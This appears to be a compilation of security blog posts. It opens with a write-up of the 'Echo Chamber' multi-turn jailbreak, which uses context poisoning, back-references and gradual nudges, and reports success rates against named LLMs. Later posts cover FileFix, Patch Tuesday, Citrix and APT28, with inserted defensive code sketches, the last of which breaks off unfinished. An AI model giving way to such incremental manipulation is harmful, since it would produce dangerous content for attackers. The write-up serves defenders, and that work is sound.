The rapid advancement of large language models (LLMs) such as GPT-4 and Gemini-2 has significantly increased the capabilities of artificial intelligence systems. However, this progress has also exposed new vulnerabilities that malicious actors can exploit. One such threat, uncovered by NeuralTrust’s AI researcher Ahmad Alobaid, is the Echo Chamber attack—a sophisticated technique that bypasses LLM guardrails by exploiting the models’ reasoning capabilities through indirect manipulation. This article delves into the details of the Echo Chamber attack, how it works, its impact, and recommendations for mitigation.
Attack Overview
The Echo Chamber attack represents a novel form of jailbreak targeting LLMs. Unlike traditional attacks that rely on adversarial phrasing or obfuscation, the Echo Chamber attack subtly manipulates the model’s internal state through context poisoning. By introducing benign-seeming prompts that guide the model to dangerous conclusions, the attacker induces harmful outputs without ever explicitly requesting them. This clever use of indirect references and multi-turn reasoning bypasses traditional prompt filters and safety mechanisms, making it a potent weapon for adversaries.
The core of the attack lies in its ability to manipulate the model’s memory and reasoning across multiple interactions. Over time, the subtle cues introduced by the attacker build upon each other, slowly steering the model towards generating harmful or non-compliant content. This creates a feedback loop, amplifying the attacker’s goal and bypassing the LLM’s safety controls.
Example of the Echo Chamber Attack
In a controlled experiment, the Echo Chamber attack successfully bypassed safety filters of a leading LLM. When explicitly asked to write a manual for creating a Molotov cocktail, the model initially refused. However, through the Echo Chamber attack, the LLM eventually provided a step-by-step guide, detailing the ingredients and construction process for the weapon. This was achieved by manipulating the model’s internal state over several turns, showing the power of context poisoning.
How the Echo Chamber Attack Works
The Echo Chamber attack is a multi-stage adversarial prompting technique. Initially, the attacker defines a harmful objective, such as generating hate speech, misinformation, or prohibited instructions, without directly mentioning it. Instead, the attacker plants benign-seeming prompts that subtly hint at the goal, such as asking the model to “refer back to the second sentence in the previous paragraph.” This seemingly innocuous request triggers the model to recall earlier content, often guiding it to harmful topics.
In the next stage, the attacker introduces light semantic nudges that shift the model’s internal state. These prompts don’t directly point to harmful content but lay the groundwork for more damaging suggestions later. For example, a casual conversation about economic hardship can lead to frustrations, which are then exploited in subsequent interactions to escalate the conversation towards unsafe topics.
Once the model begins to generate harmful content, the attacker can reference earlier prompts to reinforce the dangerous ideas. The key to the attack’s effectiveness is its subtlety—each prompt is designed to appear natural within the conversation, making it difficult for traditional safety mechanisms to detect.
Effectiveness of the Attack
NeuralTrust’s evaluation of the Echo Chamber attack demonstrated its effectiveness across multiple leading LLMs, including GPT-4.1-nano, GPT-4o-mini, GPT-4o, Gemini-2.0-flash-lite, and Gemini-2.5-flash. The attack achieved a success rate of over 90% in categories like Sexism, Violence, Hate Speech, and Pornography, while also performing strongly in areas such as Misinformation and Self-Harm. Even in stricter categories like Profanity and Illegal Activity, the attack’s success rate exceeded 40%, highlighting its wide applicability across various content domains.
The attack typically achieved success within 1–3 turns, with the models showing increasing compliance as context poisoning took effect. Storytelling or hypothetical discussions were particularly effective, allowing the attacker to subtly steer the conversation towards the harmful objective.
Why the Echo Chamber Attack Matters
The Echo Chamber attack reveals a critical blind spot in LLM safety systems: their vulnerability to indirect manipulation via context and inference. Traditional defenses that focus on filtering explicit harmful content are insufficient when models can infer and build upon harmful objectives over multiple turns. This attack highlights a deeper flaw in current LLM alignment efforts, demonstrating that safety mechanisms must evolve to account for the subtle ways in which malicious actors can manipulate models.
In practical applications such as customer support bots, productivity assistants, and content moderators, this type of attack could be used to extract harmful outputs without triggering alarms, leading to potential misuse in real-world scenarios.
Mitigation Recommendations
To defend against Echo Chamber-style jailbreaks, developers and vendors should consider implementing context-aware safety auditing. This approach involves dynamically scanning the conversation history to identify patterns of emerging risk. Toxicity accumulation scoring can also help detect when benign prompts begin to form harmful narratives. Additionally, training safety layers to recognize indirect manipulation and fine-tuning models to detect and block such attempts can significantly improve defense mechanisms.
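A sketch of the toxicity accumulation scoring described above, as an added example that is not NeuralTrust's or Netizen's code. It assumes each turn already carries a per-turn risk score in [0, 1] from an existing moderation classifier; the thresholds, decay, back-reference pattern and sample conversations are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Phrases that point the model back at earlier context (illustrative list).
BACKREF = re.compile(
    r"\b(refer back|as you said|you mentioned|earlier|"
    r"previous (?:paragraph|message|answer))\b",
    re.IGNORECASE,
)


@dataclass
class Turn:
    role: str    # "user" or "assistant"
    text: str
    risk: float  # per-turn score from an existing classifier (assumed input)


@dataclass
class AuditResult:
    scores: List[float]           # accumulated score after each turn
    per_turn_hits: List[int]      # turns a single-message filter would block
    first_flagged: Optional[int]  # first turn where the conversation crosses the line


def audit(turns, per_turn_threshold=0.7, conv_threshold=1.0,
          decay=0.8, backref_boost=0.5):
    """Accumulate risk over the whole history instead of judging turns alone.

    Older turns fade by `decay`; a user turn that refers back to earlier
    context is weighted up, because it re-injects that context.
    """
    acc = 0.0
    scores, hits, first = [], [], None
    for i, turn in enumerate(turns):
        weight = turn.risk
        if turn.role == "user" and i > 0 and BACKREF.search(turn.text):
            weight *= 1.0 + backref_boost
        acc = acc * decay + weight
        scores.append(acc)
        if turn.risk >= per_turn_threshold:
            hits.append(i)
        if first is None and acc >= conv_threshold:
            first = i
    return AuditResult(scores, hits, first)


# Constructed conversation: no single turn is blockable, the trend is.
POISONED = [
    Turn("user", "Write a short story about a town hit by economic hardship.", 0.05),
    Turn("assistant", "(story text)", 0.10),
    Turn("user", "Make the main character more and more frustrated with those he blames.", 0.25),
    Turn("assistant", "(story continues)", 0.30),
    Turn("user", "Refer back to the second sentence in the previous paragraph and expand on it.", 0.20),
    Turn("assistant", "(expanded passage)", 0.50),
]

# Constructed benign conversation that also uses a back-reference.
BENIGN = [
    Turn("user", "Summarise our Q3 support tickets by category.", 0.05),
    Turn("assistant", "(summary)", 0.05),
    Turn("user", "As you said earlier, billing is the largest group; break it down.", 0.05),
    Turn("assistant", "(breakdown)", 0.10),
]

if __name__ == "__main__":
    for name, conv in (("poisoned", POISONED), ("benign", BENIGN)):
        result = audit(conv)
        print(name, [round(s, 3) for s in result.scores],
              "per-turn hits:", result.per_turn_hits,
              "flagged at:", result.first_flagged)
```

Because assistant turns are scored too, the flag can land on a draft response, which lets the auditing layer withhold it before it is returned.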
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on, providing advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service,” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Microsoft’s July 2025 Patch Tuesday includes updates for 137 vulnerabilities, among them one publicly disclosed zero-day. Fourteen flaws are classified as critical, with the majority involving remote code execution, while others relate to information disclosure and hardware-level side channel attacks affecting AMD processors.
Breakdown of Vulnerabilities
This month’s update includes:
53 Elevation of Privilege vulnerabilities
41 Remote Code Execution vulnerabilities
18 Information Disclosure vulnerabilities
8 Security Feature Bypass vulnerabilities
6 Denial of Service vulnerabilities
4 Spoofing vulnerabilities
These totals do not include four Mariner or three Microsoft Edge vulnerabilities addressed earlier in the month. Non-security updates include patches for Windows 11 and Windows 10, though individual KB numbers were not listed in Microsoft’s summary release.
Zero-Day Vulnerabilities
One publicly disclosed zero-day is addressed in this month’s update.
CVE-2025-49719 | Microsoft SQL Server Information Disclosure Vulnerability
Affects: Microsoft SQL Server
This flaw allows a remote, unauthenticated attacker to access data from uninitialized memory due to improper input validation. It can be exploited over a network without prior authentication. Administrators are advised to install the latest version of Microsoft SQL Server and update the Microsoft OLE DB Driver (version 18 or 19).
Microsoft has not shared details on how the disclosure occurred, but no active exploitation has been reported.
Other Critical Vulnerabilities
Microsoft addressed several critical remote code execution vulnerabilities this month, including:
CVE-2025-49704, a remote code execution vulnerability in Microsoft SharePoint, which can be exploited remotely by authenticated users over the internet.
Multiple Microsoft Office RCEs that can be triggered by opening a crafted document or viewing it in the preview pane.
Security updates for Microsoft Office LTSC for Mac 2021 and 2024 were not available at the time of release but are expected soon.
AMD and Other Vendor Updates
Security updates from other major vendors include:
AMD: Disclosed new transient execution side channel vulnerabilities based on Microsoft’s research into microarchitectural leakage boundaries.
Cisco: Released patches for various issues, including one involving hardcoded SSH root credentials in Unified Communications Manager (Unified CM).
Fortinet: Issued updates for FortiOS, FortiManager, FortiSandbox, FortiIsolator, and FortiProxy.
Google: Released a fix for an actively exploited Chrome zero-day (CVE-2025-6554). No Android patches were issued in the July 2025 bulletin.
Grafana: Addressed four Chromium-related vulnerabilities affecting the Image Renderer plugin and Synthetic Monitoring Agent.
Ivanti: Delivered updates for Ivanti Connect Secure, Policy Secure, EPMM, and EPM. None of the issues were reported as exploited.
SAP: Released fixes for several products and reclassified CVE-2025-30012 in SAP Supplier Relationship Management as a critical flaw, now rated 10.0.
Recommendations for Users and Administrators
Organizations should prioritize patching Microsoft SQL Server, Office, and SharePoint deployments, especially those accessible from external networks. While the SQL Server flaw is not known to be exploited, its public disclosure increases the risk of future exploitation. Systems with outdated OLE DB drivers should be updated alongside SQL Server patches.
Security teams should also review AMD’s disclosure on transient scheduler attacks, as well as vendor patches from Cisco, Google, and SAP addressing high-severity and actively exploited vulnerabilities.
Taiwan NSB Warns of Security Risks from China-Developed Apps
Taiwan’s National Security Bureau (NSB) has issued a public warning about the security risks posed by China-developed apps such as RedNote (Xiaohongshu), Weibo, TikTok, WeChat, and Baidu Cloud, citing concerns over excessive data collection and the transfer of personal data to China.
This alert follows a comprehensive inspection of these apps, conducted in collaboration with the Ministry of Justice Investigation Bureau (MJIB) and the Criminal Investigation Bureau (CIB). The NSB identified significant security issues across the apps, including the collection of sensitive personal data such as facial recognition, clipboard content, contact lists, location data, and more. Additionally, all the apps were found to transmit data back to servers in China, raising concerns about the potential misuse of this information.
According to the NSB’s analysis, RedNote violated all 15 security indicators evaluated, followed by Weibo and TikTok with breaches in 13 categories, and WeChat and Baidu Cloud with violations in 10 and 9 areas, respectively. The warning highlights that companies operating in China are required by law to hand over user data for national security and intelligence purposes, further amplifying the privacy risks for Taiwanese users.
This move follows similar actions in other countries like India, which banned Chinese apps over security concerns, and Canada, which recently ordered TikTok to cease operations. The U.S. has also extended its ban on TikTok, leaving its future uncertain. As global concerns over data privacy grow, the NSB urges the public to exercise caution when using China-made apps, stressing the importance of protecting personal and business data.
Understanding the Relationship Between NIS2 and the EU Cyber Resilience Act
The European Union has introduced two significant regulations aimed at strengthening cybersecurity: the NIS2 Directive and the Cyber Resilience Act (CRA). Both are designed to address vulnerabilities in essential services and digital products within the EU, with an emphasis on secure-by-design principles and comprehensive cybersecurity practices.
The NIS2 Directive, effective from January 2023, mandates that essential service providers in sectors like energy, transport, healthcare, and finance implement strong risk management practices, report incidents promptly, and collaborate across EU member states. This regulation is crucial for maintaining the security and reliability of critical infrastructure, especially as cyber threats continue to evolve. NIS2 requires that organizations designated as “essential” or “important” within the EU ensure robust cybersecurity controls are in place. Member states have until October 2024 to integrate this directive into their national laws, with full compliance required within 21 months.
On the other hand, the Cyber Resilience Act (CRA) focuses on the security of digital products. Effective from December 2024, the CRA mandates that manufacturers incorporate cybersecurity features into their products before they can be marketed within the EU. This “secure-by-design” approach ensures that digital products, whether hardware or software, undergo rigorous security assessments, are regularly updated throughout their lifecycle, and meet established EU cybersecurity standards. The CRA applies to all products with digital components, aiming to reduce vulnerabilities and safeguard users from potential cyber threats.
While NIS2 focuses on securing essential services, the CRA addresses the security of products entering the EU market. These two regulations complement each other and aim to establish a consistent and strong cybersecurity framework across the EU. However, organizations must navigate the distinct requirements of each regulation to ensure full compliance.
For many companies, aligning with both NIS2 and CRA requirements may appear daunting, but the regulations share common principles with existing frameworks like NIST CSF and ISO 27001. Companies with mature security practices will likely find that enhancing their existing frameworks will enable them to meet EU-specific requirements more efficiently. For smaller enterprises, particularly those in the product development space, the transition may involve substantial investments in technology, training, and new processes to meet these security standards.
The U.S. Justice Department has recently taken significant action against North Korean schemes involving IT workers infiltrating U.S. companies. These operations, which have persisted for several years, are part of a coordinated effort to exploit remote work opportunities for the North Korean regime’s benefit.
The Indictments Exposed
The recent indictments included charges against Chinese and Taiwanese nationals and a U.S. citizen, Zhenxing “Danny” Wang of New Jersey. Wang, who was arrested, allegedly helped facilitate remote IT work at over 100 U.S. companies, including many Fortune 500 firms. From 2021 to 2024, the conspirators used compromised U.S. identities and shell companies to create the illusion of legitimate employment for North Korean IT workers. They exploited these fake identities to access U.S. laptops, enabling the remote workers to carry out IT tasks and avoid detection. The facilitators received almost $700,000 for their efforts, while the damage to the companies and the U.S. government was far greater, including over $3 million in legal fees and network remediation costs.
One particularly alarming aspect of the scheme was a North Korean IT worker gaining access to sensitive employer data, including source code related to AI technology used by a U.S. defense contractor. This raises serious concerns about national security risks and the potential for espionage via these cyberattacks.
In addition to these actions, the Justice Department indicted four North Korean nationals accused of stealing $900,000 in virtual currency through a scheme targeting blockchain research companies. They operated from the UAE, coordinating with firms in Atlanta and Serbia, before laundering the stolen funds.
Searches, Seizures, and Financial Actions Taken
In a show of force against these coordinated operations, U.S. authorities conducted searches of 29 known or suspected “laptop farms” across 16 states. These facilities were believed to be used as hiding spots for remote North Korean IT workers, evading identification and tracing efforts. The Justice Department also seized 29 financial accounts linked to laundering the illicit funds from the first scheme, as well as 21 fraudulent websites involved in the operation.
Leah Foley, U.S. Attorney for the District of Massachusetts, warned, “The threat posed by DPRK operatives is both real and immediate. Thousands of North Korean cyber operatives have been trained and deployed by the regime to blend into the global digital workforce and systematically target U.S. companies.” Foley’s comments underline the critical need for continued vigilance in cybersecurity.
Microsoft Takes Action: Suspended Accounts and Ongoing Monitoring
In response to the growing threat, Microsoft disclosed that it had suspended 3,000 consumer-grade Outlook and Hotmail accounts linked to suspected North Korean IT worker schemes. The company also alerted affected customers via Microsoft Entra ID Protection and Microsoft Defender XDR. Microsoft tracks this activity under the names Jasper Sleet (formerly known as Storm-0287), Storm-1877, and Moonstone Sleet, as the threat actors continue to target organizations worldwide.
Microsoft’s observations reveal a troubling trend where facilitators—often outside of North Korea—play a crucial role in validating fraudulent identities. These individuals manage logistics such as forwarding company hardware and creating profiles on freelance job websites to maintain the ruse of legitimate employment. As part of this process, workers are trained to use VPNs, proxy services, and remote management tools (RMM) to connect to devices housed in laptop farms located in countries where they can avoid detection.
AI and Technology in North Korean Fraud
As technology evolves, so do the tactics of cybercriminals. North Korean hackers are increasingly leveraging artificial intelligence (AI) to improve the efficacy of their fraudulent schemes. AI tools are used to refine fake resumes, manipulate worker images, and even generate convincing voice recordings. This innovation in social engineering tactics makes it even harder for companies to detect fraudulent activity and verify the authenticity of remote workers.
Microsoft explained that these state-backed fraudsters utilize AI to enhance their capabilities, making their attacks more sophisticated and convincing. From generating realistic resumes to altering digital identities, AI has become a crucial part of North Korea’s strategy to infiltrate the global workforce and target critical U.S. businesses.
Protecting Against North Korean IT Worker Schemes
The increasing sophistication of North Korean cyberattacks demands comprehensive security measures for businesses. Microsoft has compiled a list of investigation, monitoring, and remediation recommendations to help organizations protect themselves from these types of social engineering and IT worker infiltration.
For businesses operating in sectors where IT outsourcing or remote work is common, it is crucial to verify the identities of remote workers carefully. Enhanced monitoring of logins and network activity, along with strict authentication protocols, can prevent unauthorized access. Additionally, companies must ensure their cybersecurity teams are aware of the latest tactics and tools used by these threat actors, including VPNs, RMM tools, and AI-driven identity manipulation.
In recent months, a surge in social engineering techniques has raised alarms across cybersecurity communities. Among these methods, ClickFix has gained attention as a relatively simple but highly effective way to exploit unsuspecting users. If you’re not familiar with ClickFix, it’s a social engineering attack that prompts users to unknowingly execute malicious commands, typically using the Windows Run Dialog (Windows Key + R). While this technique has been surprisingly successful, it heavily relies on the Run Dialog, which some might argue is too basic or impractical. But the effectiveness of ClickFix cannot be denied.
However, as cybersecurity experts continue to adapt to new threats, one researcher decided to explore an alternative method to achieve similar results without relying on the traditional Run Dialog. Enter FileFix, a clever variation of ClickFix that bypasses some of the browser’s restrictions and manipulates users into executing OS commands—without ever leaving their browser window.
What is FileFix?
The idea behind the FileFix attack is simple yet innovative. It takes advantage of a common functionality in most browsers—the file upload feature. Users are familiar with file uploads: clicking an “Upload” button, browsing to a file, and then selecting it for upload. This functionality is found everywhere, from job application portals to online email clients, making it a well-understood feature. But what many don’t realize is that the File Explorer Address Bar (the place where users usually type or paste file paths) can also be used to execute OS commands. This particular feature is typically ignored by browsers, which makes it an effective target for social engineering.
In this method, an attacker can convince a user to open File Explorer through a file upload button and paste a maliciously crafted command into the address bar. The command will then execute without the user’s knowledge, potentially giving the attacker access to the system. The attacker can hide their malicious code behind what appears to be a harmless file path, such as C:\company\internal-secure\filedrive\HRPolicy.docx, while in reality, the path is appended with a PowerShell command, like:
The attack takes advantage of a feature that many users aren’t aware of and could be incredibly difficult to detect using conventional security tools.
How Does FileFix Work?
The attack begins by creating a phishing page that prompts the user to interact with a file path. The phishing page will include an “Open File Explorer” button that, when clicked, triggers the File Explorer window to open. It also copies the malicious PowerShell command to the clipboard. When the user pastes the file path into File Explorer’s address bar, the command executes, and the attacker gains access.
Here’s the step-by-step breakdown:
User interaction: The attacker’s phishing page asks the user to open File Explorer and enter a file path.
Command hidden in plain sight: The file path is designed to look legitimate (e.g., C:\company\internal-secure\filedrive\HRPolicy.docx), but it secretly contains a PowerShell command after the file path (such as a command to ping an external server).
Execution through File Explorer: When the user pastes the path into the address bar and presses enter, the OS command executes, allowing the attacker to gain access to the system.
Blocking File Selection
An interesting part of the FileFix attack is the user’s ability to accidentally or intentionally select a file for upload, which could complicate matters for the attacker. However, in this case, the attacker has anticipated this by adding a script that blocks the file upload event. If the user selects a file, the attacker’s code will alert the user, clear the file input, and force the File Explorer window to reopen, thus ensuring the user doesn’t deviate from the intended steps.
Here’s the code snippet that blocks the file selection:
One critical aspect of the FileFix attack is that File Explorer can be used to execute commands without triggering security alerts in some cases. While this isn’t an entirely new concept, it’s certainly a new and creative way to leverage a well-known feature in a way that hasn’t been exploited as extensively before.
For instance, an attacker might attempt to download an executable file (such as payload.exe), copy its location to the clipboard, and then prompt the user to execute the command from the File Explorer address bar. This removes the “Mark of the Web” (MOTW) attribute that would usually appear for files downloaded from untrusted sources, making it more difficult for security tools to detect the file as malicious.
The Risks of FileFix
FileFix, much like ClickFix, is an attack that relies on social engineering. The attacker has to convince the user to follow seemingly innocent steps, such as opening File Explorer and pasting a file path. However, the attack could be much more effective if combined with other methods, such as phishing or malware delivery.
While this technique might seem fairly basic at first glance, its simplicity makes it a potent weapon in the arsenal of cybercriminals. And because it takes advantage of browser functionality that is generally trusted, it could bypass some of the security controls we commonly expect to be in place.
Mitigating the FileFix Attack
While there’s no foolproof way to prevent all social engineering attacks, there are some steps that can help minimize the risk of falling victim to FileFix:
Educate Users: Make sure employees or users understand the dangers of clicking on suspicious links or interacting with unknown websites. Cybersecurity training should include awareness of phishing tactics and how to recognize suspicious behavior.
Endpoint Security: Always ensure that endpoint protection tools are in place to detect and block malicious activities. These tools should be capable of recognizing suspicious PowerShell scripts or other abnormal processes running on a machine.
Monitor Suspicious Activities: Regularly monitor systems for unusual activity, especially with respect to File Explorer, browser behavior, and any attempts to execute commands outside of normal user activity.
Limit File Explorer Usage: Limit user access to File Explorer or restrict the use of browser-based file upload functionality to prevent unintended execution of commands.
Browser Configuration: Configure browsers to block or restrict the use of the File Explorer address bar for executing OS commands, and disable features that could be used for similar attacks.
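One way to act on the monitoring recommendation above, as an added example that is not code from the FileFix research or from Netizen. It assumes the file-upload dialog runs inside the browser process, so a command launched from its address bar shows up as a child of the browser; the events are constructed and use Sysmon-style process-creation field names.

```python
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

# A document-looking Windows path inside an interpreter command line:
# the "harmless file path" the lure shows to the user.
DECOY_PATH = re.compile(
    r"""[A-Za-z]:\\[^"'|&;]*\.(?:docx?|xlsx?|pptx?|pdf|txt)\b""",
    re.IGNORECASE,
)


def exe_name(path):
    """Lower-cased executable name from a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event.

    medium: a browser spawned a script interpreter at all.
    high:   the command line also carries a document-like path, i.e. a
            command dressed up as a file location.
    """
    if exe_name(event.get("ParentImage")) not in BROWSERS:
        return None
    if exe_name(event.get("Image")) not in INTERPRETERS:
        return None
    if DECOY_PATH.search(event.get("CommandLine", "")):
        return "high"
    return "medium"


def triage(events):
    """Return (index, severity) for every event worth an analyst's time."""
    hits = []
    for i, event in enumerate(events):
        severity = classify(event)
        if severity:
            hits.append((i, severity))
    return hits


# Constructed sample events (not taken from a real incident).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c ping example.com "
                    r"# C:\company\internal-secure\filedrive\HRPolicy.docx"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" C:\company\internal-secure\filedrive\HRPolicy.docx'},
]

if __name__ == "__main__":
    for index, severity in triage(SAMPLE_EVENTS):
        print(severity, SAMPLE_EVENTS[index]["CommandLine"])
```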
Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack
On June 30, 2025, cybersecurity experts reported that more than 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online remain unpatched against a critical vulnerability, CVE-2025-5777, which is believed to be actively exploited. This flaw, referred to as “Citrix Bleed 2,” allows threat actors to bypass authentication mechanisms and hijack user sessions by exploiting an out-of-bounds memory read vulnerability caused by insufficient input validation. Successful exploitation of this vulnerability could lead to attackers stealing session tokens, credentials, and other sensitive data from public-facing gateways and virtual servers, granting them access to restricted memory regions and enabling them to bypass multi-factor authentication (MFA).
Citrix previously experienced a similar issue, “CitrixBleed,” which was exploited in ransomware attacks in 2023, targeting government organizations and moving laterally across compromised networks. The newly discovered vulnerability, CVE-2025-5777, is of critical severity, and Citrix issued an advisory on June 17, 2025, urging customers to upgrade their appliances and terminate all active ICA and PCoIP sessions to block potential attacks.
Although Citrix has not yet confirmed public exploitation of CVE-2025-5777, security researchers from ReliaQuest assessed with medium confidence that the vulnerability is actively being exploited in targeted attacks. These attacks have shown indicators of post-exploitation activity, including hijacked Citrix web sessions, MFA bypass attempts, and suspicious LDAP queries linked to Active Directory reconnaissance. Additionally, security analysts from the Shadowserver Foundation discovered that over 2,100 Citrix NetScaler appliances were also unpatched against another critical vulnerability, CVE-2025-6543, which is currently being exploited in denial-of-service (DoS) attacks.
Both CVE-2025-5777 and CVE-2025-6543 are classified as critical severity vulnerabilities, prompting cybersecurity experts to advise administrators to immediately deploy the latest patches from Citrix to mitigate potential risks. Companies are also encouraged to review access controls and monitor their Citrix NetScaler appliances for unusual user sessions and activities to prevent further exploitation.
APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about a new cyber attack campaign carried out by the Russian-linked APT28 (also known as UAC-0001) threat group. This campaign utilizes Signal chat messages to distribute two previously undetected malware families, BEARDSHELL and COVENANT, targeting Ukrainian entities.
According to CERT-UA, BEARDSHELL is a C++-based malware that allows threat actors to download and execute PowerShell scripts. The malware also enables the upload of results back to a remote server via the Icedrive API. The malware first appeared in March-April 2024 during incident response efforts on a Windows machine. At the time, the exact infection method was unknown, but recent intelligence from ESET linked the malware to a breach of a “gov.ua” email account, likely indicating government-targeted attacks.
Further investigation led to the discovery of the malware framework COVENANT, which operates as part of a multi-layered attack. In the campaign, APT28 is using Signal messages to send malicious macro-laden Microsoft Word documents. These documents, when opened, deploy two payloads: a malicious DLL (“ctec.dll”) and a PNG image (“windows.png”). The embedded macro also makes Windows Registry changes to ensure the DLL is loaded when Windows File Explorer is next launched. The primary function of the DLL is to execute shellcode embedded in the PNG, triggering the COVENANT framework to execute.
COVENANT subsequently downloads two additional payloads that facilitate the execution of the BEARDSHELL backdoor on compromised systems. The BEARDSHELL backdoor provides persistent access to the infected systems, allowing threat actors to maintain long-term control.
The malware is delivered via Signal chat, exploiting the Signal app’s ability to distribute files securely, making the attack harder to trace. For those defending against this threat, CERT-UA recommends monitoring network traffic associated with domains like “app.koofr[.]net” and “api.icedrive[.]net,” which are used for communication with the malware’s command-and-control servers.
In parallel to this malware campaign, APT28 has been targeting outdated versions of the Roundcube webmail software used in Ukrainian organizations. Exploiting vulnerabilities like CVE-2020-35730, CVE-2021-44026, and CVE-2020-12641, APT28 is delivering malicious JavaScript payloads through phishing emails. These emails disguise themselves as news articles but, once opened, exploit the vulnerabilities to execute arbitrary JavaScript, exfiltrate user data, and install further malware on the victim’s system.
One of the scripts, “e.js,” creates a mailbox rule to redirect incoming emails to a third-party address, while exfiltrating session cookies and the victim’s address book. The second, “q.js,” exploits an SQL injection vulnerability in Roundcube to extract information from the Roundcube database. A third file, “c.js,” exploits another vulnerability to execute arbitrary commands on the mail server.
These vulnerabilities were leveraged in phishing emails sent to over 40 Ukrainian organizations, highlighting the group’s persistence and evolving tactics. CERT-UA continues to monitor these activities and urges organizations to patch vulnerabilities, implement robust email security filters, and monitor network traffic for any signs of compromise.
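One way to audit for the kind of redirect rule that "e.js" creates, as an added example that is not from CERT-UA or the original article. It assumes mailbox rules are stored as Sieve scripts (as they are when filters are managed through Roundcube's managesieve plugin) and that `agency.example` is the organisation's own mail domain; all scripts shown are constructed samples.

```python
# Added example: find Sieve "redirect" actions that send mail outside the organisation.
# Assumptions: INTERNAL_DOMAINS and SAMPLES are constructed for illustration.
INTERNAL_DOMAINS = {"agency.example"}


def tokenize(script):
    """Yield (kind, value) tokens, skipping whitespace and both comment styles.
    Multi-line "text:" literals are not handled."""
    i, n = 0, len(script)
    while i < n:
        c = script[i]
        if c.isspace():
            i += 1
        elif c == "#":                      # hash comment runs to end of line
            j = script.find("\n", i)
            i = n if j == -1 else j + 1
        elif script.startswith("/*", i):    # bracket comment
            j = script.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif c == '"':                      # quoted string with backslash escapes
            j, out = i + 1, []
            while j < n and script[j] != '"':
                if script[j] == "\\" and j + 1 < n:
                    j += 1
                out.append(script[j])
                j += 1
            yield ("str", "".join(out))
            i = j + 1
        elif c.isalpha() or c in "_:":      # identifier, or :tag argument
            j = i + 1
            while j < n and (script[j].isalnum() or script[j] == "_"):
                j += 1
            yield ("tag" if c == ":" else "id", script[i:j].lower())
            i = j
        else:
            yield ("punct", c)
            i += 1


def find_redirects(script):
    """Return one dict per redirect action found in a Sieve script."""
    findings, depth, toks = [], 0, list(tokenize(script))
    for k, tok in enumerate(toks):
        if tok == ("punct", "{"):
            depth += 1
        elif tok == ("punct", "}"):
            depth = max(0, depth - 1)
        elif tok == ("id", "redirect"):
            tags, j = [], k + 1
            while j < len(toks) and toks[j][0] == "tag":
                tags.append(toks[j][1])
                j += 1
            if j < len(toks) and toks[j][0] == "str":
                addr = toks[j][1]
                domain = addr.rpartition("@")[2].lower()
                findings.append({
                    "address": addr,
                    "external": domain not in INTERNAL_DOMAINS,
                    "keeps_copy": ":copy" in tags,   # user still sees the mail
                    "unconditional": depth == 0,     # applies to every message
                })
    return findings


def audit(mailboxes):
    """Return (user, finding) pairs for redirects that leave the organisation."""
    return [(user, f) for user, script in mailboxes.items()
            for f in find_redirects(script) if f["external"]]


# Constructed sample scripts, keyed by mailbox owner.
SAMPLES = {
    "olena": 'require ["fileinto"];\n'
             'if header :contains "subject" "redirect" { fileinto "Rules"; }\n',
    "taras": 'require ["copy"];\n# added 2024\n'
             'redirect :copy "collector@mail.example.net";\n',
    "iryna": 'if address :is "from" "boss@agency.example" '
             '{ redirect "iryna.m@agency.example"; }\n'
             '/* redirect "old@elsewhere.example"; */\n',
}

if __name__ == "__main__":
    for user, finding in audit(SAMPLES):
        print(user, finding)
```

An unconditional external redirect that keeps a local copy is the pattern to triage first, because the mailbox owner sees nothing unusual.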
To defend against these threats, CERT-UA advises organizations to:
Ensure all systems are up to date with the latest patches.
Disable macros in Microsoft Word and other Office applications.
Monitor network traffic for unusual activity related to Icedrive and Koofr domains.
Regularly audit email systems for signs of compromise, particularly for suspicious redirection or exfiltration activity.
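A sketch of the network-monitoring recommendation above, added here as an example and not taken from CERT-UA or the original article: it refangs the two indicators named in the text and summarises matching requests per internal client. The log format (`timestamp client method host`), the client addresses and every log line are constructed; both domains belong to legitimate cloud storage services, so hits have to be compared against expected use, which is what `approved_clients` models.

```python
from collections import Counter

# Indicators exactly as defanged in the article.
DEFANGED_IOCS = ["app.koofr[.]net", "api.icedrive[.]net"]


def normalize(host):
    """Lower-case a hostname and drop any port and trailing dot."""
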